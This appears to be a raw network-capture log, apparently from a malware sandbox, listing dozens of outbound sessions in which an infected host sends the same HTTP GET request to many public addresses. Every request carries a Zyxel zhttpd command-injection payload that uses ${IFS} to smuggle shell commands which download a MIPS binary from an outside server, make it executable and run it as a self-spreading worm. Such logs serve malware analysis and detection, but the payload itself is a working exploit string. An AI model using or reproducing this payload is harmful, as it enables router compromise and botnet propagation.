                                    Jan 13, 2024 19:02:46.461103916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7448192.168.2.135535291.34.69.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461141109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7449192.168.2.135746012.10.58.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461180925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7450192.168.2.133455013.121.143.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461214066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7451192.168.2.1347600177.92.202.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461256981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7452192.168.2.1350304147.53.22.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461296082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7453192.168.2.1359858200.239.218.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461325884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7454192.168.2.133649069.55.45.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461363077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7455192.168.2.1338204223.114.167.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461396933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7456192.168.2.1341596152.33.137.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461438894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7457192.168.2.1346244171.73.35.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461502075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7458192.168.2.135847467.159.77.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461528063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7459192.168.2.1355410198.43.185.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461570978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7460192.168.2.135604092.42.142.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461582899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7461192.168.2.135284627.112.96.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461621046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7462192.168.2.1342746217.126.223.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461647987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7463192.168.2.134312484.245.212.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461679935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7464192.168.2.133939037.165.230.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461728096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7465192.168.2.135561266.251.137.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461769104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7466192.168.2.133792839.174.71.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461800098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7467192.168.2.133826470.145.91.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461838961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7468192.168.2.1333724210.251.103.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461890936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7469192.168.2.1346500184.114.185.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461910963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7470192.168.2.13607025.173.45.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461961985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7471192.168.2.134330012.30.54.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461990118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7472192.168.2.135421684.150.134.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462029934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7473192.168.2.1338724124.148.148.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462073088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7474192.168.2.1343384219.141.68.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462105989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7475192.168.2.1359508204.43.174.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462136030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7476192.168.2.135295248.189.136.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462207079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7477192.168.2.135681244.22.34.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462224960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7478192.168.2.1360180174.188.2.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462255001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7479192.168.2.135122412.202.18.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462306976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7480192.168.2.1360696218.114.109.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462342978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7481192.168.2.133318244.187.84.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462388039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7482192.168.2.1353776111.190.19.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462439060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7483192.168.2.135341623.198.93.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462475061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7484192.168.2.1351906136.45.252.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462511063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7485192.168.2.1340218197.62.81.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462533951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7486192.168.2.1334368141.93.192.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462596893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7487192.168.2.1349048167.165.145.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462610006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7488192.168.2.1357172133.53.244.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462634087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7489192.168.2.1336882188.173.81.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462665081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7490192.168.2.1353154163.13.208.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462730885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7491192.168.2.1360644138.32.99.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462747097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7492192.168.2.1357554126.180.222.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462785959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7493192.168.2.135465251.166.197.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462811947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7494192.168.2.1353554192.195.18.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462852001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7495192.168.2.1345230161.252.144.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462874889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7496192.168.2.134369478.41.148.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462918997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7497192.168.2.1349630115.229.220.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462969065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7498192.168.2.1337054125.2.31.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.462996960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7499192.168.2.1334376197.104.92.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463031054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7500192.168.2.1335824161.242.111.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463061094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7501192.168.2.1347728181.71.171.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463087082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7502192.168.2.134907646.58.8.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463123083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7503192.168.2.1333988171.116.172.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463176966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7504192.168.2.1345382189.22.144.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463216066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7505192.168.2.1343672188.151.230.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463232040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7506192.168.2.1344874219.109.201.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463272095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7507192.168.2.1340062183.10.143.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463329077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7508192.168.2.1338188213.48.88.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463351011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7509192.168.2.1345478105.218.233.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463402033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7510192.168.2.1352926109.19.254.147443
                                    TimestampBytes transferredDirectionData
